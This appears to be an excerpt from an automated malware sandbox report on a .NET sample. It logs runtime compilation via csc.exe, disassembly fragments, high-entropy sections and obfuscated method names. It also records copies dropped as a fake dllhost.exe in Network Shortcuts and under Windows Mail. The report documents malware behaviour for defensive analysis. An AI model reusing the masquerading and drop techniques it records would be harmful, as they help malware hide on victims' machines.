Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline"
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline"			Jump to behavior

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BAB369E push ds; iretd	0_2_00007FFD9BAB369F
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BAB00BD pushad ; iretd	0_2_00007FFD9BAB00C1
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BC14024 push eax; ret	0_2_00007FFD9BC1403F
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BC12051 pushad ; ret	0_2_00007FFD9BC12052
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BC1205B pushad ; ret	0_2_00007FFD9BC12063
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BC12646 push es; retf	0_2_00007FFD9BC12647
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BC14015 push eax; ret	0_2_00007FFD9BC14016
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BC1401B push eax; ret	0_2_00007FFD9BC1401D
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BEAE798 push esi; ret	0_2_00007FFD9BEAE799
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BEA7276 push esi; iretd	0_2_00007FFD9BEA7277
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BEAD950 push 00000064h; ret	0_2_00007FFD9BEAD954
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BEAE4DA push edi; ret	0_2_00007FFD9BEAE4EA
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BEAA8CA pushad ; ret	0_2_00007FFD9BEAA879
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 0_2_00007FFD9BEAA860 pushad ; ret	0_2_00007FFD9BEAA879
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 49_2_00007FFD9BAD369E push ds; iretd	49_2_00007FFD9BAD369F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 49_2_00007FFD9BAD00BD pushad ; iretd	49_2_00007FFD9BAD00C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 51_2_00007FFD9BAC07F7 push FFFFFFE8h; ret	51_2_00007FFD9BAC07F9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 51_2_00007FFD9BAB369E push ds; iretd	51_2_00007FFD9BAB369F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 51_2_00007FFD9BAB00BD pushad ; iretd	51_2_00007FFD9BAB00C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 51_2_00007FFD9BAD713C push ecx; retf	51_2_00007FFD9BAD712C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 51_2_00007FFD9BAD7081 push ecx; retf	51_2_00007FFD9BAD712C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 51_2_00007FFD9BAD58B9 pushfd ; retf	51_2_00007FFD9BAD58F1
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 52_2_00007FFD9BAA369E push ds; iretd	52_2_00007FFD9BAA369F
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Code function: 52_2_00007FFD9BAA00BD pushad ; iretd	52_2_00007FFD9BAA00C1
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Code function: 53_2_00007FFD9BAC369E push ds; iretd	53_2_00007FFD9BAC369F
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	Code function: 53_2_00007FFD9BAC00BD pushad ; iretd	53_2_00007FFD9BAC00C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 54_2_00007FFD9BAC07F7 push FFFFFFE8h; ret	54_2_00007FFD9BAC07F9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 54_2_00007FFD9BAD713C push ecx; retf	54_2_00007FFD9BAD712C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 54_2_00007FFD9BAD7081 push ecx; retf	54_2_00007FFD9BAD712C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 54_2_00007FFD9BAD58B9 pushfd ; retf	54_2_00007FFD9BAD58F1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe	Code function: 54_2_00007FFD9BAB369E push ds; iretd	54_2_00007FFD9BAB369F

Source: 4Awb1u1GcJ.exe	Static PE information: section name: .text entropy: 7.539895495432321
Source: hxpWOXgnBGVLArPcwqxpuA.exe.0.dr	Static PE information: section name: .text entropy: 7.539895495432321
Source: hxpWOXgnBGVLArPcwqxpuA.exe0.0.dr	Static PE information: section name: .text entropy: 7.539895495432321
Source: dllhost.exe.0.dr	Static PE information: section name: .text entropy: 7.539895495432321
Source: hxpWOXgnBGVLArPcwqxpuA.exe1.0.dr	Static PE information: section name: .text entropy: 7.539895495432321

Source: 4Awb1u1GcJ.exe, GZyhgM0amUB7JA9KLcO.cs	High entropy of concatenated method names: 'jZb07muII5', 'y2e0CfU48o', 'mKW0mjCqyp', 'yfp0Y2VGpd', 'Dispose', 'K4KeLsdu1wQlF8IjATlT', 'ck296Vduj9k4qsPUTbiN', 'fBd83xduNWTSrWpQKeVm', 'zZlhpMduEG3IReJAeK69', 'Lvj5yDduXTpLPjJl7e6n'
Source: 4Awb1u1GcJ.exe, yG07W76nGO8N81O8UIh.cs	High entropy of concatenated method names: 'x7N6LiybaV', 'zEU6IrJTdL', 'pQE6aDXJA4', 'VK56c0V4aq', 'cSV67b9aP8', 'DyH6CiIs6P', 'BIr6mxDUAI', 'MT86YjvGCk', 'YMc6sCAS1n', 'DO16BTIgkT'
Source: 4Awb1u1GcJ.exe, RTMsiyIAIVH7PTXPsU2.cs	High entropy of concatenated method names: 'PnXaipwuwv', 'Pvkad3TAMb', 'Yd7', 'sGAawJPYsH', 'hE0a2YN4oI', 'Vsfav3g3sQ', 'VjFaGPA3Vk', 'L1RZGMdDmjvaWXtPnkhD', 'we9BcYdD7a8kOlIm7yVk', 'PUAYTXdDCbEHvigfPKMP'
Source: 4Awb1u1GcJ.exe, FFO6QgL8ZGHAwRuRjrc.cs	High entropy of concatenated method names: 'ye1LrBkUpJ', 'B0bLbMPy1R', 'urrLZby6pQ', 'I2NLo8MytX', 'umgLlNrcyX', 'Wc8L4mmFSZ', 'HT8LDXqrFP', 'uu6LSUgYVG', 'SY9LWfMV1O', 'veDL3iQj6k'
Source: 4Awb1u1GcJ.exe, L4hmNdMaiNlG8H2SP8W.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'oe8M72OGBj', 'YTcdTgd0egY7hBIuVxFB', 'RnBJ2ed0g4p79DP8GtSj', 'bSmTj3d058rBiEOghs3l', 'JQP5jSd0OgemhEngvHXj', 'qBg81Nd0ydY9VbwHKVGA', 'CJ86gOd0LCfumSDVcLvl'
Source: 4Awb1u1GcJ.exe, aGQKrNEpbUVxXXgGAiX.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'XLUlHPdm7dZdbfAD5fAK', 'VSSg63dmCpcaWI0PwBAf', 'LZ7VLydmmC5kunfuaVUC', 'XOhEUOeABu'
Source: 4Awb1u1GcJ.exe, yMFjTN7m7VZHZUGVmkF.cs	High entropy of concatenated method names: 'Close', 'qL6', 'A717s9lpUD', 'FG77B1q96A', 'UfG7kO28qM', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: 4Awb1u1GcJ.exe, uTIIhQkaKFqccIxxkRV.cs	High entropy of concatenated method names: 'q4Uk7JOxiU', 'tQ0kC3BYuu', 'Nj9kmjOJlo', 'ExgkYTnoWo', 'hYIksOETG6', 'gyykBnoIw2', 'YuakkIhRbx', 'MTMk8tDUO1', 'Rlkk989bYZ', 'zZRkrslQkM'
Source: 4Awb1u1GcJ.exe, a7nsHrGWGQdwepXFSDN.cs	High entropy of concatenated method names: 'sYmGu5sG8q', 'ee7G66K6ef', 'BjCGAAaTZO', 'gxmGz5Nlhj', 'YaJ1iLUr6L', 'JNA1dPcCtc', 'NbN1wnfOD1', 'vTviEZdchDnI1EPRVxWJ', 'Y8r06AdcR79jB1xHC6Xd', 'L8NUb7dctHnxELx2e4Dy'
Source: 4Awb1u1GcJ.exe, QmjSuhQy1jVCVYo1c4K.cs	High entropy of concatenated method names: 'lPgQYVpdTA', 'LOgao7dk6JIIuxqar56c', 'bsVObLdkARNSLAT3KMqK', 'vVnLGFdkzHFbhWmc3hpW', 'AqPQI6D1lG', 'GrSQaoFS48', 'yUmQcE3q00', 'pRnWbbdkHtqni253JbSR', 'nMjjFCdk06Oavl1cANkG', 'Nf3xrMdkJEPXOR0yacVg'
Source: 4Awb1u1GcJ.exe, nx8JFyjdSpcial5QwKg.cs	High entropy of concatenated method names: 'CERj2GRJt7', 't5LjvWMdAQ', 'FgsjGfRpSC', 'SDZtn4d7E1y2B24E4uOu', 'vUnm8Ed7j5rAAh7ycL7y', 'yr7MS3d7N5LS3nvQOoGa', 'ebmJLad7X4PI4tSPxXkv', 'd25H76d7PKEBmULP4hL0', 'PSR8QZd7fXkZKE1cDOP2', 'L5fq6ed7FRWM8T7yUt2c'
Source: 4Awb1u1GcJ.exe, j0UgSR2S6rIJ3P8SKCn.cs	High entropy of concatenated method names: 'UuUv2QfSuX', 'kvIvvminOv', 'sHEvGTMepw', 'NM4ItkdI20M0jEHJh3mK', 'NI88RWdIvUsU7TsatQ0G', 'JObJQFdId2kjaPKduNwb', 'kMnYyedIwNIpqqVB59xQ', 'hqIvPsTHBV', 'GcifsMdINqV4esWM4j9P', 'u2iPfMdI1CDspfqWX8gj'
Source: 4Awb1u1GcJ.exe, NmWwgfxDemMeuPBT4gg.cs	High entropy of concatenated method names: 'YlJdNhENPnp', 'FCwxWZ77bc', 'ua4dNR8xbwM', 'YkLApvd9xiQZ2LB8ElBU', 'w1cs9Hd9K68UlFu5fH77', 'gkj5GJd9n7cZtE4VtcDo', 'LkNjyWd9Q2XwB7GV4E8B', 'VK8pHHd9qvaictK5s6vA', 'wdlMhwd9TxnHKBu0X5yS', 'zGGsSXd9V62PIIZikVDS'
Source: 4Awb1u1GcJ.exe, EKjFgh25dq5DZxTQLX9.cs	High entropy of concatenated method names: 'HVF2rFFbY0', 'xOM2b4Ks9b', 'o812ZPL5UF', 'ldi5hAdLb3VDZnsQ6JbQ', 'FWh7WddL9Za08linWhbt', 'f8bq1sdLroid4tO09ieo', 'w6LcYjdLZlB4d0SYVV4S', 'NIp2yLT5xH', 'SXB2LI2wvk', 'rlu2IbTXBv'
Source: 4Awb1u1GcJ.exe, Xm1RlujEOvrVGEyoH8Y.cs	High entropy of concatenated method names: 'nU2jPsceHI', 'ixkjfp626l', 'JsVqrad7hc59nCFf91ln', 'jyyOMpd7RQ36kbbCtZVw', 'ahkA8Rd7n04i10BSN5hJ', 'Gn6kj4d7Q2fvCcN2ewiC', 'EWbyhed7x12WMEhNPLHZ', 'HLUCxSd7KgiivndWkVG2', 'zrLlr2d7q6vQqMmXgg9C', 'H9bvWZd7TxXeSdjdqUAW'
Source: 4Awb1u1GcJ.exe, c65FJKNXrgjc1FDkAkQ.cs	High entropy of concatenated method names: 'AYyNfgwOSQ', 'cWdNF5gHdc', 'gqQNp4RpPN', 'wrXUYFdCVY1jAUDYc7KE', 'sx9cMddCeHWZQ2RArQFl', 'TqWeBMdCqm6tHaBDjYvh', 'Q0YakodCT4Yv2E3tesMS', 'l8alendCgVFUuatEvIgu', 'L0H8IwdC5luREvtuFVor', 'DRSbkgdCOJhhe3ylEaSr'
Source: 4Awb1u1GcJ.exe, oSG9420FDvyKeEtuvj7.cs	High entropy of concatenated method names: 'IxI0US5wCv', 'fff0QXasod', 'or60qDxHUP', 'VOY0TBX61T', 'WLs0V7Ysix', 'I6o0e1WHw1', 'Af30gPKxnh', 'Weg05tdqJq', 'Dispose', 'HeClACdJz20XCZRurbKD'
Source: 4Awb1u1GcJ.exe, ftEIiEYm03lyUqTt6LP.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'JpkNERd3ROxEooerChxX', 'Ft9f2Ad3UHfGf10Gcf6P', 'PfT5rAd3h0D325VDqJQy'
Source: 4Awb1u1GcJ.exe, a5tuxn1e2EXKhJMMymP.cs	High entropy of concatenated method names: 'wJJ1aLOhtp', 'HrGYQBdc9nZiFLGUMF6T', 'wE7yi2dckULgk4ivj4OQ', 'KwMCafdc8YB92M5OEwwX', 'E94', 'P9X', 'vmethod_0', 'f75dvxdVTlp', 'K6jdNEIB5vn', 'imethod_0'
Source: 4Awb1u1GcJ.exe, CHRt6kxpToLIISjAmFd.cs	High entropy of concatenated method names: 'iBKxx7isXC', 'XvMZ1Fd84dAL99xVoh7G', 'Ffa1Krd8DYwIoOWXh9WB', 'uBowvnd8o8ZkkGNdDZh0', 'mpu9jId8lxjOEgmXyBH6', 'UcvWWod8Siw9FETV2P1m', 'HgLxU5FBi9', 'rTmtyQd8BjbfnNG7NTy6', 'D8081Ld8k1CCe6IHspf7', 'PJ9bdAd88E8KtEQf7xIA'
Source: 4Awb1u1GcJ.exe, ttkkqIkJkaX27rVYBkU.cs	High entropy of concatenated method names: 'tTFk6JneQQ', 'FgHkAr4npy', 'mgXkzupswB', 'yGO8iprIZP', 'K3d8dKiBZZ', 'bMA8w4iSBL', 's9A82ClYiH', 'Qqh8vJP2w4', 'rkn8GAxv9c', 'vuf81O3Qhs'
Source: 4Awb1u1GcJ.exe, qt1T39Ji5BbgtTn20Oh.cs	High entropy of concatenated method names: 'WhtJvhGWyX', 'JvqJGCgJvv', 'U0up7gduchIjOOyfj6fF', 'R4xDgSdu7NYFVySJDC2x', 'o5B4syduICWV68NJAafq', 'agaWnRduaBviCkvW03Lc', 'F5jsaLduCBAoAcLvbvrt', 'qa806HdumWmAMlR0YQWG', 'Cn8JwT4Qg2', 'VUr8fCdu5E59g8DGiT6S'
Source: 4Awb1u1GcJ.exe, vF1u4mgVb8YojKiWjA2.cs	High entropy of concatenated method names: 'WVFggRPmT1', 'lN6g51Gc80', 'WpMgOuMYHI', 'aXkgygGnXv', 'BYQgLNJxBC', 'qmdMDBdZkV3fHdCE9ADQ', 'M6OGhidZsxqBcsGUMXx5', 'TZghmcdZBxMjNBaP2yS4', 'XF0GvedZ8cj3VMKgQ5IO', 'hegcUZdZ9V6mIaT5jJfe'
Source: 4Awb1u1GcJ.exe, xqPrWXKdLUXTQFbHTFC.cs	High entropy of concatenated method names: 'rC9', 'method_0', 'VhRdNQoaMqb', 'ScRdNx6uX56', 'sG4MpUd978mRuAvTnQme', 'i5D9Frd9CMicgRymYUtY', 'MJ5lopd9m2cK7OUEP2PW', 'jMTsmfd9YbtZTompUMnE', 'VCcqeJd9sTIu1Vskg95M', 'lFuVuxd9BgPayLKWieN9'
Source: 4Awb1u1GcJ.exe, lAPjt5O29Zdi89wmSgN.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 't6YOGLPmZ0', 'Write', 'NwCO1rlg44', 'yErOj6w7cp', 'Flush', 'vl7'
Source: 4Awb1u1GcJ.exe, hTHTet5PGXLHu3dGjGI.cs	High entropy of concatenated method names: 'wgM5FIhLTl', 'NSc5p65yCG', 'P6e5tqsFx0', 'q4r5U0Ntbu', 'fNf5hNSQDK', 'F2Agv8dZzDi0r4vxxAkv', 'TKYantdZ6Fv4pKqNUkuf', 'n4kCkrdZAYgwbX2qlH1m', 'cvwWbmdoiJwjWh6hpQmH', 'yvP7Addod5Rt8aX0ie3V'
Source: 4Awb1u1GcJ.exe, E7M18Ey3BSfsvLWG2WP.cs	High entropy of concatenated method names: 'aDUyHvHHlT', 'po7y054oI7', 'ywjyJU9Svx', 'FASyuhgnSN', 'oIXy60iohK', 'P0AebOdlILJb802gWZaJ', 'KqxKqYdlyUl10JPsx58L', 'u8ucRGdlLKm15EWnWt4n', 'xQkjlodlaMNj7JvQPiIN', 'M2nn87dlcuq2QlmaQeFI'
Source: 4Awb1u1GcJ.exe, BsISPuVXp81LSG8f2dv.cs	High entropy of concatenated method names: 'FQIVaDU8s8', 'x0lVfDpSIp', 'VCaVF8SwXY', 'eZOVpijEWx', 'PafVtMIf3Q', 'bw2VUpgJJC', 'rt0VhUvfkH', 'c9FVRvWvhY', 'E2AVnH0KYP', 'D9kVQVaDb0'
Source: 4Awb1u1GcJ.exe, K6RkL9EVXHWAyMRKhg6.cs	High entropy of concatenated method names: 'DMbvRLds7GUyEEwWfqX1', 'OK6eSGdsaVfq20VBbWxy', 'rqup0TdscU9tGQ3LSOKI', 's3XpAMwkrh', 'NsTvW7dssnMt7hP2TaaD', 'IlnNhZdsmZmgB8q6Gqao', 'GPBduvdsYk224oro3SL3', 'XFCtxMdsBbjvNawYIprZ', 'MmV13SdskRpcwLtOlZMG', 'Wv6tdVbTHl'
Source: 4Awb1u1GcJ.exe, Wkn5BmtT4umU3BgTscP.cs	High entropy of concatenated method names: 'rIeQFgKHRI', 'loQQpKAR2f', 'vVO77sdk85cbtoPA69Il', 'jTKM4YdkBuebW0I87gAq', 'InNLxodkkJ853FZG9kHs', 'yxoOkIdk9MSOlpouGbaW', 'CTMQQ5ya1Z', 'KQ7up7dkoEFIrqme1NN0', 'PpRljsdkbg2f65GwguXZ', 'j5LDxrdkZGneYGmNKfYI'
Source: 4Awb1u1GcJ.exe, UwoHyoz6wRCmihCl2F.cs	High entropy of concatenated method names: 'a5Ydd296YN', 'WRHd2EvDK8', 'LQydvtFURg', 'bA7dGPq0d9', 'B6Hd1YLM77', 'dEBdjkwZEo', 'sVRdE57Bg5', 'WU9noZdONnvu9Wg8WPjd', 'Hwm1phdOE7LQstGa9Am8', 'Y07WM4dOXNDvGjB3OC1g'
Source: 4Awb1u1GcJ.exe, IXFM7t8mylU5BS3dVIN.cs	High entropy of concatenated method names: 'q7kAMjdHCpcL7sNlxfBg', 'XgPmKJdHmXgOFNY3efsl', 'WImMaQdHcsnjPP2M2rFg', 'GAKNqSdH77VKcg8p4Vib', 'fyn45xdHy3bywUROTx3N', 'DhWsuXdHL2ey2g9jPTWq', 'KeA3DXdHIrmSWcxXR8Xe', 'FQcrbJdH5mwMnAecmEPO', 'kAdhaYdHOjUi02vV8go4'
Source: 4Awb1u1GcJ.exe, HMioR05ac4GOOU6BXod.cs	High entropy of concatenated method names: 'method_0', 'eiU57MwRwx', 'fGJ5CWiwoB', 'r8W5mMUNLW', 'lXM5YhP7XC', 'dTk5s6RayL', 'KwF5B8DyBB', 'oCDqITdojZ91wDHsW3fE', 'ENR3VxdoNkHOaZPieC7G', 'sqbUPNdoEWNWC7H9Tu4j'
Source: 4Awb1u1GcJ.exe, AhcOsTNhY66JY2jW2sV.cs	High entropy of concatenated method names: 'H0DNxrCfcA', 'WeisBudCsUpfFJLNr3ET', 'XJEjyVdCmDjJLOKMbWkt', 'Xkjt7XdCYwRLNyyTx7ky', 'bURfeidCBybuKiuOSs1p', 'C81Nn6g4cO', 'HxVJFAdCa5NQMZqUM0dP', 'EVXF1GdCcQty9ZIOHwRr', 'SywZIndC7bq3miQcbhKZ', 'N18OVydCLlUEa3ev4flF'
Source: 4Awb1u1GcJ.exe, AjsCmSwSPpKWvTqH6iU.cs	High entropy of concatenated method names: 'JyM2jguNxY', 'irTIk2dLi8qF26XvX5o3', 'KDl55wdLdPcfvEopYaZY', 'OtonFudLwZE7qWV4GA5e', 'D2IjbVdyAT2wGGM1qfHY', 'E5ZaJ7dyz4guucsGx57O', 'C07veGdL2rHDMZmxImWq', 'xrs2iC09MH', 'N6B2wESvPy', 'leo2288HkN'
Source: 4Awb1u1GcJ.exe, tjxG7raupDLe0eIl4tT.cs	High entropy of concatenated method names: 'BtUaAkpBfB', 'HGkaz6w7QF', 'pgJciNOu7x', 'FVCcdVWwBw', 'gSycwS0dpj', 'TT2c2RtTQH', 'Rpx', 'method_4', 'f6W', 'uL1'
Source: 4Awb1u1GcJ.exe, w7QSb6dM8bYZFs6KSmJ.cs	High entropy of concatenated method names: 'P9X', 'LlKd03OOtr', 'VLmdNiQGwyY', 'imethod_0', 'O78dJFrCeP', 'PQLUMXdO0GjQskRtnGtv', 'TU3nJHdOMaHQ09n2RVH8', 'z1fEArdOHReGTYNyU8mn', 'BAs1DNdOJTTblSCD9GNL', 'BbhV5GdOu4dSRABQhKlF'
Source: 4Awb1u1GcJ.exe, DApBlnCsMZtCTZIg8xc.cs	High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'cpLCkH5fqH', 'uanC8stuDG', 'N1OC94560H', 'bDjCreoC84', 'qpKCbn6hAI', 'EMCCZXiufa', 'CVLfYedWO5lyS6nunDRe'
Source: 4Awb1u1GcJ.exe, l32wtUx0QXtoG2xCTNM.cs	High entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'dD8xuexAWS', 'woLdNnRIAnp', 'pg3GVwd9OgFXLGytiZNE', 'jew7Ijd9gDpOZJPqnhew', 'Lq4j4vd95joxCP9KjBv7', 'b0I3TLd9yXq9ymuDdliA', 'n0nP3Xd9LKF4eo5sMvY0'
Source: 4Awb1u1GcJ.exe, NwlYosBE24v5JMPqGqS.cs	High entropy of concatenated method names: 'J7MBeDUZOj', 'p3E1Sed3zRy3qIZq0vPa', 'ETc2Dyd36Xw60Bp6AJBv', 'GvSSk8d3AXeL4DVrOLyZ', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0', 'qsZdvO5xS2R'
Source: 4Awb1u1GcJ.exe, CBnCujaNxNyqw4KqNj6.cs	High entropy of concatenated method names: 'cBEaXJu3bV', 'GJqaPqFFeO', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'G7kafVKeQe', 'method_2', 'uc7'
Source: 4Awb1u1GcJ.exe, eaK1mJYTZ6ARVVUgF0P.cs	High entropy of concatenated method names: 'Ic7YenPROS', 'eciu7SdWuPtt36bh238H', 'xCqDtodW6ZE7eUrqMj3L', 'UJBLccdWAjKbwVlXbakB', 'thyhgTdWzCnpTy9FlrNX'
Source: 4Awb1u1GcJ.exe, LaW7oWIZk5o0thfO5J6.cs	High entropy of concatenated method names: 'Y58IlRluoR', 'tnvI4UPXGC', 'vFSIDJxeJ8', 'B4tISmFbG4', 'eDoIWD4hLm', 'DVCqv7dDT0FeU4uYmKkv', 'a3t9FNdDVcmY8P7JRg89', 'T5ayeWdDeOSUt5U1U33U', 'pshkDJdDKTwo3l6TEVje', 'xojj6AdDq6Plir7w01kT'
Source: 4Awb1u1GcJ.exe, VoiN0q6kZGtv34TY3io.cs	High entropy of concatenated method names: 'VUbd1ccivmT', 'xHsd177G871', 'uxld1Cg8ywa', 'Enld1mDIhXp', 'pNCd1YgAV9K', 'QJVd1slFkDb', 'YKUd1BNSTAw', 'B6lAGrp0GO', 'lGfd1kcad1X', 'yfCd18J85kp'
Source: 4Awb1u1GcJ.exe, vcSW6ivkdeVZZO0Wv8k.cs	High entropy of concatenated method names: 'rjSv6T1VEW', 'uTepKwdaXQ0kewmH5p4N', 'h5tp4wdaPYZfY4vOY822', 'f5RTsodaNPpJov51dJnS', 'Y2qTZ2daENFTO2BK3FwZ', 'SGVBS7dat1IYdFxwfxY7', 'EK0cKidaFiLSaE5oDTbZ', 'ukVtBBdapU46mT2ailPs', 'GgPEuydaULk8VE3JI8bA', 'u6VG1frkgK'
Source: 4Awb1u1GcJ.exe, FUwseodA2r72TSXT9Kg.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'cZPdNd7Vu60', 'Am5dvdUKZ6E', 'jJ0YJOdOzRKeiSlh0tAo', 'wuLpiGdyinJ2pkp6IVGd', 'U9RCfrdydvPt9lEKaxe3', 'xxcPOZdywlqSksD68mKY'
Source: 4Awb1u1GcJ.exe, YxcdgeNorIVGca3o606.cs	High entropy of concatenated method names: 'QwkN0GTE4n', 'jext0jdmPai8oRbeWc44', 'fKocbKdmEWgp2qGPXMgi', 'CO0UofdmX4e3HgQisdS8', 'dVCOpGdmftVmfX9qql0M', 'P9X', 'vmethod_0', 'qsZdvO5xS2R', 'imethod_0', 'yH5256dmvU3Tkg0hVMxL'
Source: 4Awb1u1GcJ.exe, C4htKnwaCJRMENrPoov.cs	High entropy of concatenated method names: 'UZYw9foLA9', 'IV5wrgCJ5L', 'vAnPnsdysYVfspDwRUfQ', 'KxqhoFdyBC5ASBbF3mZJ', 'zCLZSodykxd3svLYijaR', 'aqkwlYZAwc', 'uUZEcUdybt79kamVuFb7', 'OXAULodyZGWZE5rEYYM4', 'fiJFPIdy9cHRFtLgJTRR', 'jm7Rh4dyrtFmKggNghbn'
Source: 4Awb1u1GcJ.exe, d619BPqFbvRDKhvJDmQ.cs	High entropy of concatenated method names: 'bepVdnOHec', 'oYrXAndbR2FMaXS3ncA0', 'vHY4eKdbUWi3lWtLxsa5', 'uZt2PrdbhWDV5Epy1anV', 'FPHe5jdbnOf3J3LrSyIR', 'WdBqt7o7WX', 'rcmqUbWIQc', 'CbYqhFRhca', 'iPDqRVtUni', 's8qqns18vj'
Source: 4Awb1u1GcJ.exe, YVVfINEwHresYuFLwUd.cs	High entropy of concatenated method names: 'dsWEvUKwl0', 'rHlEGWwLMM', 'xNEE1Hcjym', 'd7oEjvRaMK', 'zcxENLUW9y', 'POXEEBAflU', 'hAlEXjgqLo', 'JOpEP1WypE', 'andEflPaue', 'TRjEFaN21Z'
Source: 4Awb1u1GcJ.exe, ku6Z0k7SjgIxBsfA22H.cs	High entropy of concatenated method names: 'wMl73Gqodj', 'k6r', 'ueK', 'QH3', 'UyG7MxgLKe', 'Flush', 'pXd7Hw3bDj', 'Xwg70BB5bC', 'Write', 'FAP7JjlrmY'
Source: 4Awb1u1GcJ.exe, eoespD19tMlw7UUVxxH.cs	High entropy of concatenated method names: 'POd10iDKXx', 'b8r1JfF5uh', 'bq31uSebw3', 'TfDgjKd7vdAhlMBOaD5I', 'o5x5y7d7wQGfJGZhHe4O', 'RIga7Gd72AZ4UZT8apqW', 'mPgahKd7G6wE3YQ1e80l', 'PYF1baIKQS', 'QIx1ZQkFlM', 'LXR1oA6Uc5'
Source: 4Awb1u1GcJ.exe, rb0ki2GboqDEwhAonAi.cs	High entropy of concatenated method names: 'bIjGDm7eup', 'ciwNCidcvGjF4AxND22w', 'NVxt5xdcGUQuZEHoMh2c', 'q78CNSdc11C3TWUZfcQG', 'aoySagdcjOfQHrmm4489', 'U1J', 'P9X', 'whXdvUToK4J', 'DW8dvhIMPpP', 'rObdNjUv09Q'
Source: 4Awb1u1GcJ.exe, v0YpV2ebCEyk6n0iodX.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'IWkeokbcHm', 'Ad5el4Kn2r', 'Dispose', 'D31', 'wNK'
Source: 4Awb1u1GcJ.exe, LLKw8mjQY2UApec5RBE.cs	High entropy of concatenated method names: 'i6NjyNp3v2', 'wCxCYCd7lUx2pZy7ZXdp', 'wMWmMfd7ZChZMWBVwhtc', 'yPITSLd7o5HZeFDJRB9o', 'nICGtOd74rPojUBBGrF7', 'TP72WQd7DBEdRLj4f0fm', 'oBX9fed7SK58ja9OA0Gv', 'anEjKGghdN', 'X6BjqU03mx', 'djUjTbUxjI'
Source: 4Awb1u1GcJ.exe, UeeidlyonyeiZe7aOa9.cs	High entropy of concatenated method names: 'jtKy4smNtM', 'N0XyD1PdCQ', 'gbWySLmV7O', 'HKdL9ZdlKT5ZcnVDIGWs', 'VXANXUdlqFuJRVaXdqlK', 'voKQYrdlT1SyO9dnvgWY', 'gx6HaIdlV79dlTlW1Skb', 'deNfHLdleokSOwq72iQg', 'UcCFMIdlg3Jv6J9TUWSp', 'm8iVTldl5lsehIVNtJOf'
Source: 4Awb1u1GcJ.exe, mTkTOPGUjU8haYW04FQ.cs	High entropy of concatenated method names: 'eSqGOONuwT', 'zgjGyNkvO0', 'Df7GLqL4ql', 'DBXVxOdab3e5eJvAmhB1', 'FTZtKbdaZp79XCqtma8I', 'A6I20Lda97YhkwK7yWaC', 'OGwSLEdarI6GE4RD5mTL', 'JdlGVS5hAi', 'guIGe6Kvyq', 'RDUX3UdakSqJNO8bs3SP'
